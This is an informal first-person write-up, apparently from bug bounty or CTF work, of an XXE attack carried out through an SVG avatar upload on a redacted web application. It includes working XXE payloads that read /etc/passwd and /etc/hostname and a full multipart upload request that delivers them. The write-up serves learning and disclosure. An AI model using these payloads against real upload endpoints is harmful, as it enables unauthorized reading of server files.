Write-up: XXE-File-upload ( SVG )

Baby paws:

  1. I looked for what are the functionalites available in the WEB app just to see what are the possible attack vectors.
  2. I analyzed the WAF and found what triggers it and what are blocked characters
  3. I found a upload field that explicitly uses these three formats: PNG, XML, and EPS. ie The upload field for the avatar. That allowed me to check for imagetragick, ghost script and some fuckery over file uploads!. So I was looking for some shells HTB style.
  4. I ruled out the first two and was doing more recon then I started doing some XXE things to the SVGs
  5. so lets start, I tried to do something this first:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

#FAILED

But god knows we tried :)

so Lets add some attributes to this:

<?xml version="1.0" encdoing="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>  

Son of a bitch I’m in: Request:

POST /redacted/redacted/and/redacted HTTP/1.1
Host: redacted.site
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Cookie: session=blehhhhh
-----------------------------177039707011430280861789912306
Content-Disposition: form-data; name="csrf"
5
-----------------------------177039707011430280861789912306
C
Content-Disposition: form-data; name="avatar"; filename="your-weekend-is-lost-you-blue-team-beta.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> 

-----------------------------177039707011430280861789912306

Response:

HTTP/1.1 302 Found
Location: /avatar/change/confirmation/redacted
Connection: close
Content-Length: 0

and I see my avatar is not visible but the DOM of the site shows something like:

<img src="/redacted/moreRedacted/avatarUser.svg" class="avatar">

then I opened the image by copying the path and ENDORPHINS IN and The feeling of winning an arguement with your SO and them appologizing continues